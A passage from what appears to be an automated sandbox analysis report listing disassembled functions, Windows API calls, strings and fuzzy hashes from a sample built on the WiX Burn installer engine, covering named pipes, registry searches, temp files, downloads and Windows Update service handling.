                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000), ref: 0092C357
                                                                                                                                                                  • ConnectNamedPipe.KERNEL32(?,00000000), ref: 0092C368
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092C372
                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 0092C39E
                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000), ref: 0092C3CF
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092C4BB
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092C4F2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastNamedPipe$HandleState$ConnectCurrentProcessSleeplstrlen
                                                                                                                                                                  • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                  • API String ID: 3141773871-2019809298
                                                                                                                                                                  • Opcode ID: e561e94f82e78c97e16f89dc6cdc234fede3f7433451dff177443159e4b7ddd5
                                                                                                                                                                  • Instruction ID: 86c4cda7859ffe44981f86c631c969cfca794780cd4c4cfe53f89f6e82019060
                                                                                                                                                                  • Opcode Fuzzy Hash: e561e94f82e78c97e16f89dc6cdc234fede3f7433451dff177443159e4b7ddd5
                                                                                                                                                                  • Instruction Fuzzy Hash: D651E5B2E40239BBD710EA949C89FFF79A8AB48B14F114529FE05FB290D674DC0197E1
                                                                                                                                                                  Function 00927249 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 263COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00927456
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00927400
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeHeapString$AllocateProcess
                                                                                                                                                                  • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 336948655-1873729996
                                                                                                                                                                  • Opcode ID: 711c5c02a74afe884496a957ee1250cda7b5fe4d5e97fb8681d0a0de2215e377
                                                                                                                                                                  • Instruction ID: f1a7b9f8248a586a21890b32188fd9f59aa1f1a6c75351c88c2ed826d71f3f26
                                                                                                                                                                  • Opcode Fuzzy Hash: 711c5c02a74afe884496a957ee1250cda7b5fe4d5e97fb8681d0a0de2215e377
                                                                                                                                                                  • Instruction Fuzzy Hash: DC812A71B44324FBDB10EA909C4AFAFBB79AFC4B11F214068FA15BB2D1D6B0AD409754
                                                                                                                                                                  Function 00914B8A Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 195fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempFileNameW.KERNEL32(00000000,000000F6,?,00000000,00000000,00000104,00000000,7FFFFFFF,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000000,?), ref: 00914C12
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00914C20
                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000005,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000000,?), ref: 00914CB8
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00914CC5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$CreateNameTemp
                                                                                                                                                                  • String ID: %ls%x.TMP$Failed to allocate buffer for GetTempFileNameW.$Failed to allocate memory for file template.$Failed to allocate temp file name.$Failed to copy temp file string.$Failed to create file: %ls$Failed to create new temp file name.$Failed to create temp file.$Failed to get length of path to prefix.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                  • API String ID: 2316751675-672087311
                                                                                                                                                                  • Opcode ID: 5982eccf2df46c403ad870d21194ddbaa2747c412bde4cc784f6cffc92b8e978
                                                                                                                                                                  • Instruction ID: 96b6f54e6f6804e71bc2dc800c6209a6aaf16501fa267eab4027345067d07967
                                                                                                                                                                  • Opcode Fuzzy Hash: 5982eccf2df46c403ad870d21194ddbaa2747c412bde4cc784f6cffc92b8e978
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C516B32B8132D76DF311A549C0BFEF3D68DF89B20F114224BE28BE1D1E6B09D909690
                                                                                                                                                                  Function 00955BAD Relevance: 28.2, APIs: 4, Strings: 12, Instructions: 177COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,00000001,?,?,00940D82,00951FD9,8000FFFF,00916DA2,00000008,00000000,00000000,?,?,8000FFFF,-000000AB), ref: 00955BB6
                                                                                                                                                                  • GetProcessId.KERNEL32(?,00000000,?,00000001,08000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00955CDD
                                                                                                                                                                    • Part of subcall function 0092C2ED: lstrlenW.KERNEL32(0001C580,009173DE,00000000,00916CF2,00009002,?,000000B0,00000000,00000000,000000B0,?,?,00916CF2,00000000,00000000), ref: 0092C320
                                                                                                                                                                    • Part of subcall function 0092C2ED: GetCurrentProcessId.KERNEL32(?,?,00916CF2,00000000,00000000), ref: 0092C32B
                                                                                                                                                                    • Part of subcall function 0092C2ED: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000), ref: 0092C357
                                                                                                                                                                    • Part of subcall function 0092C2ED: ConnectNamedPipe.KERNEL32(?,00000000), ref: 0092C368
                                                                                                                                                                    • Part of subcall function 0092C2ED: GetLastError.KERNEL32 ref: 0092C372
                                                                                                                                                                    • Part of subcall function 0092C2ED: Sleep.KERNEL32(00000064), ref: 0092C39E
                                                                                                                                                                    • Part of subcall function 0092C2ED: SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000), ref: 0092C3CF
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,00940D82,?,00955B00,8000FFFF,00000008,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00955D7A
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,00940D82,?,00955B00,8000FFFF,00000008,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00955D8D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to wait for embedded process to connect to pipe., xrefs: 00955CFC
                                                                                                                                                                  • Failed to append embedded args., xrefs: 00955C5E
                                                                                                                                                                  • %ls -%ls %ls %ls %u, xrefs: 00955C4A
                                                                                                                                                                  • Failed to append user args., xrefs: 00955C8F
                                                                                                                                                                  • Failed to wait for embedded executable: %ls, xrefs: 00955D55
                                                                                                                                                                  • Failed to create embedded pipe name and client token., xrefs: 00955BF8
                                                                                                                                                                  • %ls, xrefs: 00955C7B
                                                                                                                                                                  • Failed to process messages from embedded message., xrefs: 00955D2B
                                                                                                                                                                  • Failed to create embedded process at path: %ls, xrefs: 00955CC6
                                                                                                                                                                  • burn.embedded, xrefs: 00955C42
                                                                                                                                                                  • Failed to create embedded pipe., xrefs: 00955C27
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\embedded.cpp, xrefs: 00955C07, 00955D64
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Handle$NamedPipeProcess$CloseCurrentState$ConnectErrorLastSleeplstrlen
                                                                                                                                                                  • String ID: %ls$%ls -%ls %ls %ls %u$Failed to append embedded args.$Failed to append user args.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$d:\a\wix4\wix4\src\burn\engine\embedded.cpp
                                                                                                                                                                  • API String ID: 732280565-1736165384
                                                                                                                                                                  • Opcode ID: 9c3badbab294d20a6d81b5164a1bd392531bd692b505bbbe786c224511f287bd
                                                                                                                                                                  • Instruction ID: 8c674e07d5f91709090b3f4e24f14063d1866dd31290f5c18a2da26017a3128f
                                                                                                                                                                  • Opcode Fuzzy Hash: 9c3badbab294d20a6d81b5164a1bd392531bd692b505bbbe786c224511f287bd
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E511832A80B29BBDF22DB95DD0BFDE7BB4AF08B11F110111FA04BA1D1D3B499548B90
                                                                                                                                                                  Function 0093D370 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 146windowregistryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegisterClassW.USER32(?), ref: 0093D3C1
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0093D3CC
                                                                                                                                                                  • CreateWindowExW.USER32(08000000,009922B4,00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0093D439
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0093D445
                                                                                                                                                                  • ShowWindow.USER32(00000000,00000008), ref: 0093D486
                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 0093D497
                                                                                                                                                                  • IsDialogMessageW.USER32(?,?), ref: 0093D4AB
                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0093D4B9
                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 0093D4C3
                                                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093D4D0
                                                                                                                                                                  • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 0093D508
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$ClassErrorLastWindow$CreateDialogDispatchEventRegisterShowTranslateUnregister
                                                                                                                                                                  • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$d:\a\wix4\wix4\src\burn\engine\uithread.cpp
                                                                                                                                                                  • API String ID: 1467104317-2033051560
                                                                                                                                                                  • Opcode ID: 2e7a77e416db00d974f18533f2b0a4d1bbc75b1cf6e5edafda738ecc8f86fc4d
                                                                                                                                                                  • Instruction ID: bc1f753a30ab9d2abfe935acd43bbbd655351cf5bf48e151f856e4b46099444a
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e7a77e416db00d974f18533f2b0a4d1bbc75b1cf6e5edafda738ecc8f86fc4d
                                                                                                                                                                  • Instruction Fuzzy Hash: F141C473D45224BBDB208B949C0DFDEBAB8EF48750F108055F919BB290E774A940CFA0
                                                                                                                                                                  Function 009777DD Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 297filememoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,000000FF,?,?,00000078,00000000), ref: 00977817
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00977825
                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 00977883
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00977892
                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00977B0C
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00977B1B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                                                                                                                  • String ID: Content-Length not returned for URL: %ls$Failed to allocate buffer to download files into.$Failed to allocate range request header.$Failed to create download destination file: %ls$Failed to request URL for download: %ls$Failed while reading from internet and writing to: %ls$GET$Range request not supported for URL: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                  • API String ID: 2028584396-2838033101
                                                                                                                                                                  • Opcode ID: d97ee4c2dd366afc7b03353fb5faa0d4344b853f1a0dddf0a056e9a16ff15462
                                                                                                                                                                  • Instruction ID: 40ccdbfc5ec85d203c393c44c9be91f706d900353a239d13a0ad583c2293ec34
                                                                                                                                                                  • Opcode Fuzzy Hash: d97ee4c2dd366afc7b03353fb5faa0d4344b853f1a0dddf0a056e9a16ff15462
                                                                                                                                                                  • Instruction Fuzzy Hash: 0FA18472E44219BBDB119FD4CC45FEEFAB9AF48714F158515FA18B7280E7708D409BA0
                                                                                                                                                                  Function 00921481 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 251registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00917162,00916DEA,00000000,C95B5EC6,?,?,7D8B5756,?,00916CF2,00000000,00000000,00916DEA,00917162,878D5010,00916CF2), ref: 00921737
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to query registry key value., xrefs: 009215C3
                                                                                                                                                                  • Failed to format value string., xrefs: 009214FB
                                                                                                                                                                  • Failed to set variable., xrefs: 009216E9
                                                                                                                                                                  • Failed to read registry value., xrefs: 0092169A
                                                                                                                                                                  • Failed to change value type., xrefs: 009216C0
                                                                                                                                                                  • Failed to open registry key., xrefs: 00921550
                                                                                                                                                                  • Failed to format key string., xrefs: 009214C9
                                                                                                                                                                  • Unsupported registry key value type. Type = '%u', xrefs: 00921613
                                                                                                                                                                  • Registry key not found. Key = '%ls', xrefs: 0092156E
                                                                                                                                                                  • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 009215AC
                                                                                                                                                                  • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0092170F
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 009215FF, 0092160A, 00921625, 009216FB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to change value type.$Failed to format key string.$Failed to format value string.$Failed to open registry key.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                  • API String ID: 3535843008-3422224897
                                                                                                                                                                  • Opcode ID: 031a478874492fe75b5fc7c172303548a0a1e4ea5bc81a58fc004e3f7e21606c
                                                                                                                                                                  • Instruction ID: 02047758a3fcc4cdd24f3cc158b76134f3f40a20452a963a613d9d7e80efc25d
                                                                                                                                                                  • Opcode Fuzzy Hash: 031a478874492fe75b5fc7c172303548a0a1e4ea5bc81a58fc004e3f7e21606c
                                                                                                                                                                  • Instruction Fuzzy Hash: 98813632E4062EBBDF12AEA0DD46FEEBA7DAF54704F110161F601B6190E3759E609B90
                                                                                                                                                                  Function 009496F3 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 175serviceCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,?,?,?,?,?,00949D0A,?), ref: 0094972C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00949D0A,?,?,?), ref: 0094973B
                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,00949D0A,?,?,?), ref: 00949795
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00949D0A,?,?,?), ref: 009497A1
                                                                                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00949D0A,?,?,?), ref: 009497E9
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00949D0A,?,?,?), ref: 009497F3
                                                                                                                                                                    • Part of subcall function 009498F9: ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00949898,00000000,00000003), ref: 00949910
                                                                                                                                                                    • Part of subcall function 009498F9: GetLastError.KERNEL32(?,00949898,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00949D0A,?), ref: 0094991A
                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 009498D5
                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 009498E0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Service$ErrorLast$CloseHandleOpen$ChangeConfigManagerQueryStatus
                                                                                                                                                                  • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp$wuauserv
                                                                                                                                                                  • API String ID: 2017831661-2546018573
                                                                                                                                                                  • Opcode ID: f7e65b7fc3d50ad807bb803c39503c39abd9d8d94acd8822a83eaf1387565674
                                                                                                                                                                  • Instruction ID: e18f055d8ef1ae70866203c8f60f9b8689c4af65ccba6cd7850d8cf9786a1d6e
                                                                                                                                                                  • Opcode Fuzzy Hash: f7e65b7fc3d50ad807bb803c39503c39abd9d8d94acd8822a83eaf1387565674
                                                                                                                                                                  • Instruction Fuzzy Hash: 9351E732F80324B7D7219B988C49FEF7AB89B8AB14F154164FE05BB381D675DC4086A0
                                                                                                                                                                  Function 00914456 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 142COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?), ref: 0091446B
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 0091447A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00914484
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 009144C9
                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000105,?,?,?), ref: 00914509
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,?), ref: 00914517
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00914525
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 009145B4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$FileModuleName
                                                                                                                                                                  • String ID: Failed to allocate space for module path.$Failed to get max length of input buffer.$Failed to get path for executing process.$Failed to get size of path for executing process.$Failed to re-allocate more space for module path.$Unexpected failure getting path for executing process.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                  • API String ID: 1026760046-3511924
                                                                                                                                                                  • Opcode ID: bfdc683f40f8be7becb38ff37f39a5ab950409593a1098e1d0b17d36e4aafacc
                                                                                                                                                                  • Instruction ID: d61f4c8d0bd3588b444f8b2c12559683e1a0259d1185aa348a05a44b2275441f
                                                                                                                                                                  • Opcode Fuzzy Hash: bfdc683f40f8be7becb38ff37f39a5ab950409593a1098e1d0b17d36e4aafacc
                                                                                                                                                                  • Instruction Fuzzy Hash: 03412673B402287BE7215B589C4AFEF6AADEB49B50F114060FE14FB191E2748D8097A1
                                                                                                                                                                  Function 009759D8 Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 254registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00916CF2,00916CF2,009331C1,00000000,00916CF2,009331C1,00000000,00000001,00000000,00020019,00916CF2,009331C1,009331C1,00020019,00000000,00916CF2), ref: 00975B9C
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00916CF2,009331C1,009331C1,00020019,00000000,00916CF2,00020019,009331C1,00000000,00916CF2,-80000001,00000000,009331C1,009331C1,00916CF2), ref: 00975C87
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,009331C1,009331C1,00020019,00000000,00916CF2,00020019,009331C1,00000000,00916CF2,-80000001,00000000,009331C1,009331C1,00916CF2), ref: 00975C98
